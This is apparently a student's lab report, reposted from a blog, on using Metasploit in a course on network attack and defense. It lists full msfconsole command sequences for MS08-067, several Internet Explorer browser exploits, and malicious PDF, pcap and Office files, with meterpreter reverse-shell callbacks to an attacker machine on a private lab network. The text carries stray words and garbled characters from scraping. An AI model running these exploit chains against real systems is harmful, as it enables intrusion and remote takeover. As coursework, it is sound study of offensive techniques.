2019-2020-2 網絡對抗技術 20175206李得琛 Exp6 MSF基礎應用

實踐基礎知識

1.模塊:
模塊是指Metasploit框架中所使用的一段軟件代碼組件,查看六種模塊源碼目錄/usr/share/metasploit-framework/modules
共六個模塊:html

滲透攻擊模塊;
輔助模塊;
攻擊載荷;
空字段模塊;
編碼模塊;
後滲透攻擊模塊;

2.用戶操做界面:web

msfconsole
armitage
webgui

3.攻擊方式shell

主動攻擊:直接攻擊系統開啓的漏洞服務,獲取系統控制權
攻擊瀏覽器,獲取系統控制權
攻擊客戶端應用,獲取系統控制權
本地提權

4.使用命令windows

search name:用指定關鍵字搜索能夠利用的漏洞模塊
use exploit name:使用漏洞
show options:顯示配置選項
set option name option:設置選項
show payloads:回鏈攻擊載荷
show targets: 顯示目標(os版本)
set TARGET target number:設置目標版本
exploit:開始漏洞攻擊
sessions -l:列出會話
sessions -i id:選擇會話
sessions -k id:結束會話
Ctrl+z:把會話放到後臺
Ctrl+c:結束會話
show auxiliary:顯示輔助模塊
use auxiliary name:使用輔助模塊
set option name option:設置選項
exploit:運行模塊

實踐內容

任務一:主動攻擊實踐
任務二:一個針對瀏覽器的攻擊
任務三:一個針對客戶端的攻擊
任務四:成功應用任何一個輔助模塊api

實踐過程

任務一:主動攻擊實踐

1.MS08_067自動化漏洞
攻擊機IP:kali 192.168.64.144
靶機:Win2000 192.168.64.166
輸入msfconsole進入控制檯,依次輸入如下指令:瀏覽器

use exploit/windows/smb/ms08_067_netapi;
show payloads;
set payload generic/shell_reverse_tcp ;//回連
set LHOST 192.168.64.144
set LPORT 5206
set RHOST 192.168.64.166
set target 0
exploit


任務二:一個針對瀏覽器的攻擊

1.針對瀏覽器的攻擊MS11-050
攻擊機IP:kali 192.168.64.144
靶機:Win2000 192.168.64.166
輸入msfconsole進入控制檯,依次輸入如下指令:session

use windows/browser/ms11_050_mshtml_cobjectelement;
set payload windows/meterpreter/reverse_http
set LHOST 192.168.64.144
set LPORT 5206
set RHOST 192.168.64.166
set URIPATH ldc20175206
exploit



攻擊失敗,靶機沒法找到該網頁,攻擊機出現錯誤字樣。框架

2.針對瀏覽器的攻擊MS10_018
攻擊機IP:kali 192.168.64.144
靶機:WinXP 192.168.64.165
輸入msfconsole進入控制檯,依次輸入如下指令:tcp

use windows/browser/ms10_018_ie_behaviors;
set payload windows/meterpreter/bind_tcp
set LHOST 192.168.64.144
set LPORT 5206
set RHOST 192.168.64.165
set URIPATH 20175206ldc
exploit


攻擊成功!出現suceesfully字樣。工具

3.針對瀏覽器的攻擊MS06-013(惟一)
輸入命令serach browser查看漏洞:

選取漏洞進行攻擊
攻擊機IP:kali 192.168.64.144
靶機:Win2008 192.168.64.165
輸入msfconsole進入控制檯,依次輸入如下指令:

use windows/browser/ms06_013_createtextrange;
set SRVHOST 192.168.64.144
set URIPATH 66666
exploit


攻擊成功!發送代碼1-100!

任務三:一個針對客戶端的攻擊

攻擊機IP:kali 192.168.64.144
靶機:WinXP 192.168.64.136
Adobe:
在msfconsle中輸入命令:

use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp //tcp反向回連
set LHOST 192.168.64.144
set LPORT 5206
set FILENAME ldc20175206.pdf
exploit //攻擊

咱們發現建立的PDF文件生成位置:


copy到靶機中並打開:
在攻擊機中輸入:

use exploit/multi/handler //進入監聽模塊
set payload windows/meterpreter/reverse_tcp //tcp反向鏈接
set LHOST 192.168.64.144 //攻擊機ip
set LPORT 5206 //攻擊端口固定
exploit


雖然沒有打開pdf,可是已經獲得回連顯示,輸入dir便可成功得到回連!

任務四:成功應用任何一個輔助模塊

攻擊機IP:kali 192.168.64.144
靶機:WinXP 192.168.64.136
這裏在試驗了多個漏洞以後,發現仍是針對wireshark的攻擊較爲方便,由於wireshark以前在XP中已有安裝。
wireshark pcap攻擊
輸入msfconsole進入控制檯,依次輸入如下指令:

msfconsole //進入控制檯
use exploit/windows/fileformat/wireshark_packet_dect.rb
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.64.144
set LPORT 5206
set FILENAME ldc20175206.pcap
show options
exploit


而後back回基礎界面,輸入下列命令:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.64.144
set LPORT 5206
exploit

在靶機中打開咱們傳入的pcap文件,便可獲得回顯!

雖然打開仍是沒有相應,可是咱們經過攻擊機的現象已經瞭解到攻擊成功!

再來一個office的攻擊:
攻擊機IP:kali 192.168.64.144
靶機:WinXP 192.168.64.136
和以前同樣輸入命令

use windows/fileformat/ms11_006_createsizeddibsection
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.64.144
set LPORT 5206
set FILENAME ldc20175206.pcap
show options
exploit

將生成的doc傳到靶機中,開始監控,便可獲得現象!如圖,成功獲得回顯!

實驗成功!

實踐問題

基礎問題回答

(1)用本身的話解釋什麼是exploit,payload,encode。
exploit:攻擊模塊,是利用靶機的系統漏洞進行攻擊的模塊。
payload:載荷模塊,是傳輸攻擊所用的代碼和數據的模塊。
encode:編碼模塊,是用來對攻擊代碼編譯更新的模塊。

(2)離實戰還缺些什麼技術或步驟?
從本次實驗中就能夠看出來,咱們進行滲透的時候,發現版本都是一些舊的,或者是被淘汰和即將被淘汰的版本(指已經不是主流使用版本),這樣實用性就變得很是的弱。並且即使是win XP系統,咱們也須要讓系統的防火牆關閉才能進行系統的攻擊。而實際攻擊狀況下,系統須要是最新的版本,防火牆也是最新的,對漏洞的種類更新應該已經齊全。其次,防火牆不是關閉的而是開啓着的,咱們的滲透攻擊沒法跨過防火牆。這麼看來,咱們距離實戰還有很長的一段路要走,最起碼以如今的程度就不要稱本身是在搞滲透了,咱們還應該繼續深刻研究每一個版本,尋找其漏洞進行分析和處理,以更好的保護咱們的系統,修復漏洞,防止有心人利用這些漏洞作非法的事情,對咱們形成巨大的損失。

實驗總結與體會

  • 總結與體會 本次實驗對靶機版本的要求異常的苛刻,windows有些版本有時候會出現攻擊失敗的狀況,這從側面說明了攻擊是時使用的工具侷限性。每次攻擊失敗老是讓我極爲的頭疼,爲此我把我全部的windows版本的虛擬機都當作靶機進行處理和攻擊,主機win10沒有進行攻擊,由於經過info查看漏洞適用範圍連win10的影子的沒見,就沒有使用win10系統。看了以前學長學姐的博客,發現主要仍是集中於win2000,XP等老舊版本,雖然版本比較老舊,可是也能夠做爲滲透經驗進行積累,根據現象進行分析,爭取早日達到實戰的效果。
相關文章
相關標籤/搜索